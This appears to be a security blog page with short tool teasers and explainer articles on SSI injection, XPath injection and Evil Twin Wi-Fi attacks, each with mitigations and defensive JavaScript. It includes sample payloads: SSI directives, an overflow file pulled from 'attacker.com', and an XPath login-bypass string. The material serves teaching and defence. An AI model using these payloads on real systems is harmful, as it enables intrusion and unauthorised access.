Up1 – Client Side Encrypted Image Host
Up1 is a client-side encrypted image host that can also encrypt text and other data and then store them, with the server knowing nothing about the contents. It can display images, text with syntax highlighting and short videos, and serve arbitrary binaries as downloads. How it Works Before an image is uploaded, […]

Read the full post at darknet.org.uk



Criminal Rings Hijacking Unused IPv4 Address Spaces
So apparently this hijacking of unused IPv4 addresses has been going on for a while, but with quite a number of attempts recently, it has ramped up a LOT since the September announcement by ARIN about IPv4 depletion. There were only 50 hijacking attempts between 2005 and 2015. Since September, ARIN has already seen 25 […]





Cuckoo Sandbox – Automated Malware Analysis System
Cuckoo Sandbox is open source software for automating the analysis of suspicious files. To do so it uses custom components that monitor the behaviour of malicious processes while they run in an isolated environment. In other words, you can throw any suspicious file at it and in a matter of seconds Cuckoo will provide […]





Unicorn – PowerShell Downgrade Attack
Magic Unicorn is a simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple: just run Magic Unicorn (ensure Metasploit is installed and in the…




Web Application Log Forensics After a Hack
Sites get hacked; it’s not pleasant, but it happens. A critical part of the response, especially in my experience, has been the web application log forensics applied directly after an attack. You can usually piece together what happened, especially if the attacker doesn’t rotate IP addresses during the attack. With a little poking around and after…




movfuscator – Compile Into ONLY mov Instructions
The M/o/Vfuscator (short ‘o’, sounds like “mobfuscator”) compiles programs into only mov instructions, and nothing else – no cheating. Arithmetic, comparisons, jumps, function calls, and everything else a program needs are all performed through mov operations; there is no self-modifying code, no transport-triggered calculation, and no other…




What is a Server Side Include Injection Attack or SSI Injection Attack?

Attackers often exploit security vulnerabilities in web applications to inject malicious code into the server, steal sensitive data, spread malware or carry out other malicious activities. The Server Side Includes Injection Attack, or SSI Injection Attack, is one such attack.
In an SSI Injection Attack, the attacker takes advantage of security vulnerabilities in a web application to inject malicious code through Server Side Includes directives.
What are Server Side Includes or SSI?
Nowadays, most web servers serve dynamic pages. The server takes input from the user through text boxes, radio buttons, images and so on, and passes it to a program on the web server, which processes the information and generates output. The output is sent back to the browser, which then displays the resulting HTML page.
At times, though, generating the whole page dynamically is inefficient and unnecessary. Instead, only a part of the page content can be generated dynamically and inserted into an existing HTML page. Server Side Includes are directives used for exactly that purpose: with them, dynamic content can be embedded in an existing HTML page before it is displayed.
For example, a web page may display the local date and time to a visitor. Generating the whole page dynamically every time with a program or a dynamic technology may be inefficient. Instead, one can put the following SSI directive into an existing HTML page:
<!--#echo var="DATE_LOCAL" -->
As a result, whenever the page is served to the client, this fragment is evaluated and replaced with the current local date and time:
Sunday, 25-Jan-2016 12:00:00 EST
Whether to use SSI directives to generate a fragment of the page dynamically, or to generate the whole page with some dynamic technology, often depends on how much of the page is dynamic. If a major part of the page content is generated dynamically, SSI may not be a good solution.
Server Side Includes Injection Attack or SSI Injection Attack
In an SSI Injection Attack, the attacker first finds out whether a web application is vulnerable to Server Side Includes Injection, or SSI Injection. Normally, a web application is vulnerable to SSI Injection through manipulation of the SSI directives already in use, or through a lack of proper validation of user input.
If a web application has pages with the extensions .stm, .shtm or .shtml, that indicates to attackers that the application uses SSI directives to generate page content dynamically. If the web server permits SSI execution without proper validation, the attacker can trick it into executing SSI directives that manipulate the server's filesystem: adding, modifying and deleting files, or displaying the content of sensitive files like /etc/passwd.
Alternatively, the attacker can enter the following characters in a user input field to find out whether the web application properly validates user input:
< ! # = / . " - > and [a-zA-Z0-9]
These characters are commonly used in SSI directives, so a web application becomes vulnerable to SSI Injection if it does not properly validate user input and allows these characters where they are not expected. The attacker can take advantage of that to access sensitive information or execute shell commands.
As SSI directives are executed before the page content is supplied to the client, the data intended for the attack is displayed the next time the web page is loaded.
Example
Suppose a web application is vulnerable to SSI Injection. The attacker can then trick the web server into executing the following SSI directive, which displays the current document's filename:
<!--#echo var="DOCUMENT_NAME" -->
The attacker can also create a file attack.shtml with the following content:
attack.shtml

<!--#include file="AAAA....AAAA" -->

with the number of A's greater than 2049.
Now suppose the web application loads a legitimate URL like:
vulnerable.com/index.asp?page=about.asp
The attacker can then include his own file attack.shtml in the web application like this:
vulnerable.com/index.asp?page=attacker.com/index.asp?page=attack.shtml

If the web server returns a blank page, that indicates an overflow has occurred. The attacker now has enough information to trick the web application into executing malicious code.

How To Stay Safe
- User input should be properly validated so that it does not contain characters like <, !, #, =, /, ., ", -, > and [a-zA-Z0-9] when they are not needed.
- Make sure the web server only executes the SSI directives needed for a particular web page.
- HTML-entity-encode user input before passing it to a page that executes SSI directives.
- Make sure a page is executed with the permissions of the file owner rather than those of the web server user.
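The first and third of these measures can be checked in code. The following is an added example, not code from the original article: it flags the metacharacters listed above, entity-encodes untrusted input before it is spliced into an SSI-enabled page, and counts how many directives the SSI parser would find in the rendered result. The function names, the TEMPLATE fragment and the sample comment are constructed for this example.

```javascript
// Added example (not from the original article): neutralising SSI directive
// syntax in untrusted input before it is inserted into an SSI-enabled page,
// plus a check for the metacharacters the article lists. Function names,
// the TEMPLATE fragment and the sample comment are constructed.

// Directive verbs understood by common SSI implementations (e.g. Apache mod_include).
const SSI_VERBS = ["echo", "include", "exec", "config", "set", "printenv",
  "fsize", "flastmod", "if", "elif", "else", "endif"];

// Matches the start of an SSI directive: "<!--", optional whitespace, "#", a verb.
const SSI_DIRECTIVE_SOURCE = "<!--\\s*#\\s*(?:" + SSI_VERBS.join("|") + ")\\b";
const SSI_DIRECTIVE_RE = new RegExp(SSI_DIRECTIVE_SOURCE, "i");

// True if the text contains anything the SSI parser would treat as a directive.
function containsSsiDirective(text) {
  return SSI_DIRECTIVE_RE.test(text);
}

// Number of directives in a rendered page; lets us confirm that only the
// page's own directive survived rendering.
function countSsiDirectives(text) {
  const matches = text.match(new RegExp(SSI_DIRECTIVE_SOURCE, "gi"));
  return matches ? matches.length : 0;
}

// The characters the article lists as SSI metacharacters. Reject input that
// contains them in fields where they are not needed (a username, a ZIP code).
const SSI_METACHARS = /[<!#=\/."\->]/;
function hasSsiMetachars(text) {
  return SSI_METACHARS.test(text);
}

// HTML entity encoding: "<" becomes "&lt;", so "<!--#" can no longer open a directive.
const ENTITY_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function htmlEntityEncode(text) {
  return text.replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// A .shtml fragment as the server would pass it through the SSI parser. The
// DATE_LOCAL echo is the page's own, legitimate directive.
const TEMPLATE =
  'Served on: <!--#echo var="DATE_LOCAL" -->\n' +
  '<p class="comment">{{comment}}</p>';

// Vulnerable: untrusted input spliced into the page unchanged.
function renderUnsafe(comment) {
  return TEMPLATE.replace("{{comment}}", () => comment);
}

// Safe: the input is entity-encoded first, so an injected directive reaches
// the browser as visible text instead of being executed by the server.
function renderSafe(comment) {
  return TEMPLATE.replace("{{comment}}", () => htmlEntityEncode(comment));
}

// Constructed sample input carrying the directive shown earlier in the article.
const INJECTED_COMMENT = 'nice site <!--#echo var="DOCUMENT_NAME" -->';

console.log("directives in unsafe render:", countSsiDirectives(renderUnsafe(INJECTED_COMMENT))); // 2
console.log("directives in safe render:  ", countSsiDirectives(renderSafe(INJECTED_COMMENT)));   // 1
console.log(renderSafe(INJECTED_COMMENT));
```

The encoding step is the one that actually removes the risk; the metacharacter check is only appropriate for fields whose legitimate values never contain those characters, since a free-text comment field cannot reasonably forbid a full stop or a hyphen.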


Being informed about the various web application security vulnerabilities is the very first step towards safeguarding a web application. I hope this article served its purpose.

XPath Injection Attack

What is XPath
Many web applications use XML, or eXtensible Markup Language, to store and transport data in a format that is both human-readable and machine-readable. It is often used to separate data from presentation.
To give an example, a web server may store data in separate XML files, with a small piece of JavaScript that reads the XML files and updates the contents of HTML pages.
XSLT, or eXtensible Stylesheet Language Transformations, is the recommended stylesheet language for XML; it is used to transform an XML document into HTML.
XPath is a major element of XSLT. It is used in XSLT to navigate through an XML document and find the required information.
To give an example, let’s consider this XML document:
<?xml version="1.0" encoding="UTF-8"?>

<bookstore>

<book category="HACKING">
<title lang="en">Learn Hacking</title>
<author>Tony Stark</author>
<year>1995</year>
<price>50.00</price>
</book>

</bookstore>
In a modern browser, you can load the XML document using XMLHttpRequest:
var xhr = new XMLHttpRequest();
xhr.open("GET", "bookstore.xml", false); // placeholder URL for the document above; synchronous for brevity
xhr.send();
var xmlDoc = xhr.responseXML;
And the following XPath query will select the title of the book from the XML document:
var xpath = "/bookstore/book/title";
var result = xmlDoc.evaluate(xpath, xmlDoc, null, XPathResult.ANY_TYPE, null);
Calling result.iterateNext() then returns the matching <title> element.
What is XPath Injection Attack
Let’s understand this with an example.

Suppose we have an authentication system on a web page that takes a username and password from the user and uses XPath to look up the matching user in the following XML document.
<?xml version="1.0" encoding="utf-8"?>
<Users>
<User ID="1">
<FirstName>Tony</FirstName>
<LastName>Stark</LastName>
<UserName>AnthonyStark</UserName>
<Password>SecretForJarvis</Password>
<Type>Admin</Type>
</User>
<User ID="2">
<FirstName>Arnold</FirstName>
<LastName>Cook</LastName>
<UserName>ACook</UserName>
<Password>SecretForArnold</Password>
<Type>User</Type>
</User>
</Users>
Let’s say it builds the following XPath by string concatenation to look for the user:
FindUserXPath = "//User[UserName/text()='" & Request("Username") & "' and Password/text()='" & Request("Password") & "']"
So an attacker can send a malicious username and password to the web application to select XML nodes without knowing any actual username and password:
Username: blah' or 1=1 or 'a'='a
Password: blah
Logically, FindUserXPath then becomes equivalent to:
//User[(UserName/text()='blah' or 1=1) or
('a'='a' and Password/text()='blah')]
As the first part of the XPath is always true, the password part becomes irrelevant and the UserName part matches the admin. The query can thus reveal sensitive information from the server to the attacker, which the attacker can exploit for malicious purposes, and the web application is vulnerable to XPath Injection Attack.
Mitigation
  • Use a parameterized XPath interface whenever possible.
  • If the XPath query must be constructed dynamically, escape the user input properly.
  • In a dynamically constructed XPath query, if you use quotes to delimit untrusted input, make sure to escape that quote character within the untrusted input so that it cannot break out of the quoted part. For example, if a single quote (') is used to delimit the input username, replace any single quote (') character in the input with the XML-encoded version of that character, &apos;.
  • Using a precompiled XPath query is always good. With it, the user input gets escaped properly without missing any character that should have been escaped.
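The following is an added example, not code from the original article, showing the FindUserXPath query above built both ways: the vulnerable concatenation transcribed to JavaScript, and a version in which each input is rendered as a proper XPath 1.0 string literal. Instead of the entity replacement described above it uses the XPath-literal technique (switch the delimiting quote, or split the value with concat() when it contains both kinds of quote), so the value can never terminate the literal. The function names and the xpathStringLiteral helper are constructed for this example; where the XPath library supports variables (a parameterized interface such as $username bound through a variable resolver), that remains the preferable route.

```javascript
// Added example (not from the original article): the article's FindUserXPath
// query built from untrusted input, first as the vulnerable concatenation and
// then with every input rendered as an XPath 1.0 string literal. Function
// names and the xpathStringLiteral helper are constructed.

// Vulnerable: the article's concatenation, transcribed to JavaScript. A quote
// in either input ends the literal and the rest becomes XPath syntax.
function findUserXPathUnsafe(username, password) {
  return "//User[UserName/text()='" + username +
         "' and Password/text()='" + password + "']";
}

// Renders a value as an XPath 1.0 string literal. XPath literals have no
// escape character, so: no single quote -> single-quoted; no double quote ->
// double-quoted; both present -> concat() of pieces, with each single quote
// carried inside a double-quoted literal.
function xpathStringLiteral(value) {
  if (!value.includes("'")) return "'" + value + "'";
  if (!value.includes('"')) return '"' + value + '"';
  const pieces = value.split("'").map((p) => "'" + p + "'");
  return "concat(" + pieces.join(", \"'\", ") + ")";
}

// Safe: whatever the user types is compared as data, never parsed as XPath.
function findUserXPathSafe(username, password) {
  return "//User[UserName/text()=" + xpathStringLiteral(username) +
         " and Password/text()=" + xpathStringLiteral(password) + "]";
}

// Constructed sample: the article's injection payload as the username.
const PAYLOAD_USERNAME = "blah' or 1=1 or 'a'='a";

console.log(findUserXPathUnsafe(PAYLOAD_USERNAME, "blah"));
// //User[UserName/text()='blah' or 1=1 or 'a'='a' and Password/text()='blah']
console.log(findUserXPathSafe(PAYLOAD_USERNAME, "blah"));
// //User[UserName/text()="blah' or 1=1 or 'a'='a" and Password/text()='blah']
console.log(xpathStringLiteral('O\'Neil "Tony"'));
// concat('O', "'", 'Neil "Tony"')
```

In the safe output the whole payload sits inside one double-quoted literal, so the predicate compares UserName against the literal text "blah' or 1=1 or 'a'='a" and matches no user.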

Intro to Evil Twin in Wireless Networks

What is Evil Twin
An Evil Twin is basically a rogue Wi-Fi access point. It may look very similar to a legitimate one, but it is actually controlled by attackers. Most of the time it uses an SSID, or Service Set Identifier, very similar to that of the legitimate access point. Sometimes it even provides a stronger signal than the legitimate one so that it attracts clients more easily. Any data that travels through an Evil Twin access point can therefore be intercepted by the attackers.
Purpose of Evil Twin
Attackers set up Evil Twins mainly to steal sensitive data or for other phishing attacks. If a victim connects to an Evil Twin, any non-HTTPS data can easily be intercepted, as it travels through the attackers’ equipment. So if the user logs in to an unprotected bank or email account, the attacker has access to the entire transaction.
The victim may even be presented with a login prompt from the attacker’s server, tempting him to provide sensitive information like usernames and passwords, which results in a phishing attack.
How is Evil Twin created
An Evil Twin can easily be created by an attacker with a smartphone or computer and some readily available software. The attacker first positions himself near a legitimate Wi-Fi hotspot and finds out the SSID and signal strength of the access point. He then broadcasts his own signal using the same or a very similar SSID. The attacker may also position himself near the potential victims so that his signal lures them. Some attackers even use software to deauthenticate victims from the legitimate Wi-Fi access point, so that when they reconnect they join the Evil Twin, since it provides the stronger signal.
Mitigation
  • It is always a good idea to use a VPN. It creates an encrypted tunnel before transmitting data, which makes it hard for the attacker to intercept that data.
  • Software like EvilAP_Defender can be used by a network administrator to detect Evil Twins. It looks for:
          • Wi-Fi access points with a similar SSID but a different BSSID (the MAC address of the wireless access point).
          • The same BSSID as the legitimate access point, but with different attributes like channel, cipher, privacy protocol, authentication etc.
          • Even the same BSSID and attributes as the legitimate access point, but with a different tagged parameter, like the OUI or Organizationally Unique Identifier assigned by the IEEE registration authority.
  • Before connecting to a Wi-Fi network, do not rely on the name of the wireless access point alone; verify that it is the legitimate one.
  • While using public Wi-Fi, it is always better to restrict browsing to websites that do not require any sensitive data like login credentials.
  • Avoid providing any sensitive information while using public Wi-Fi, even if a website or login screen asks for it.
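The three checks EvilAP_Defender is described as making can be expressed as a small comparison between a whitelisted access point and the beacons seen in a scan. The following is an added example, not code from the original article or from EvilAP_Defender: it compares a known-good access point against constructed scan records and reports which of the three conditions each suspicious record matches. The record layout, the vendorOui field (standing in for the OUI read from the beacon's vendor-specific tagged parameter), the SSID similarity threshold and the scan results are all assumptions made for this example.

```javascript
// Added example (not from the original article): an EvilAP_Defender-style
// comparison of a known-good access point against beacon scan records, using
// the three checks listed in the article. The record layout, the vendorOui
// field, the similarity threshold and the scan results are constructed.

// Whitelisted access point as recorded by the administrator.
const KNOWN_GOOD_AP = {
  ssid: "CoffeeShop_WiFi",
  bssid: "00:11:22:aa:bb:cc",
  channel: 6, cipher: "CCMP", privacy: "WPA2", auth: "PSK",
  // OUI carried in the beacon's vendor-specific tagged parameter (assumed field).
  vendorOui: "00:11:22",
};

// Constructed scan results: the legitimate AP, four imitations and an unrelated network.
const SCAN_RESULTS = [
  { ssid: "CoffeeShop_WiFi", bssid: "00:11:22:aa:bb:cc", channel: 6,  cipher: "CCMP", privacy: "WPA2", auth: "PSK",  vendorOui: "00:11:22", signal: -55 },
  { ssid: "CoffeeShop_WiFi", bssid: "66:77:88:de:ad:01", channel: 6,  cipher: "CCMP", privacy: "WPA2", auth: "PSK",  vendorOui: "66:77:88", signal: -30 },
  { ssid: "CoffeeShop-WlFi", bssid: "66:77:88:de:ad:02", channel: 1,  cipher: "NONE", privacy: "OPEN", auth: "OPEN", vendorOui: "66:77:88", signal: -32 },
  { ssid: "CoffeeShop_WiFi", bssid: "00:11:22:aa:bb:cc", channel: 11, cipher: "TKIP", privacy: "WPA",  auth: "PSK",  vendorOui: "00:11:22", signal: -35 },
  { ssid: "CoffeeShop_WiFi", bssid: "00:11:22:aa:bb:cc", channel: 6,  cipher: "CCMP", privacy: "WPA2", auth: "PSK",  vendorOui: "66:77:88", signal: -33 },
  { ssid: "Library_Guest",   bssid: "aa:bb:cc:00:00:01", channel: 3,  cipher: "CCMP", privacy: "WPA2", auth: "PSK",  vendorOui: "aa:bb:cc", signal: -70 },
];

// Case and punctuation are ignored, so "coffeeshop wifi" and "CoffeeShop_WiFi" compare equal.
function normalizeSsid(ssid) {
  return ssid.toLowerCase().replace(/[^a-z0-9]/g, "");
}

// Edit distance between two strings (single-row dynamic programming).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1,
                        diagonal + (a[i - 1] === b[j - 1] ? 0 : 1));
      diagonal = above;
    }
  }
  return row[b.length];
}

// "Similar" means identical after normalisation or within two edits (threshold assumed).
function isSimilarSsid(a, b) {
  const x = normalizeSsid(a), y = normalizeSsid(b);
  return x === y || levenshtein(x, y) <= 2;
}

const COMPARED_ATTRIBUTES = ["channel", "cipher", "privacy", "auth"];

// Returns a reason string if `seen` looks like an Evil Twin of `known`, else null.
function classifyAccessPoint(known, seen) {
  const sameBssid = seen.bssid.toLowerCase() === known.bssid.toLowerCase();
  if (!sameBssid) {
    // Check 1: a similar SSID advertised by a different radio.
    return isSimilarSsid(known.ssid, seen.ssid) ? "similar-ssid-different-bssid" : null;
  }
  // Check 2: cloned BSSID, but channel/cipher/privacy/authentication differ.
  const changed = COMPARED_ATTRIBUTES.filter((k) => seen[k] !== known[k]);
  if (changed.length > 0) return "same-bssid-different-attributes:" + changed.join(",");
  // Check 3: everything matches except the OUI in the vendor-specific tagged parameter.
  if (seen.vendorOui.toLowerCase() !== known.vendorOui.toLowerCase()) return "same-bssid-different-oui";
  return null;
}

// One alert per suspicious record, in scan order.
function detectEvilTwins(known, scans) {
  return scans
    .map((ap) => ({ bssid: ap.bssid, ssid: ap.ssid, reason: classifyAccessPoint(known, ap) }))
    .filter((alert) => alert.reason !== null);
}

for (const alert of detectEvilTwins(KNOWN_GOOD_AP, SCAN_RESULTS)) {
  console.log(`ALERT ${alert.bssid} "${alert.ssid}": ${alert.reason}`);
}
```

Run against the constructed scan, the legitimate record and the unrelated Library_Guest network produce no alert, while the four imitations are each reported with the condition that exposed them. In a real deployment the scan records would come from a monitor-mode capture and the whitelist from the administrator's own inventory.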
So, beware of all the security vulnerabilities and recent threats and stay safe, stay secured.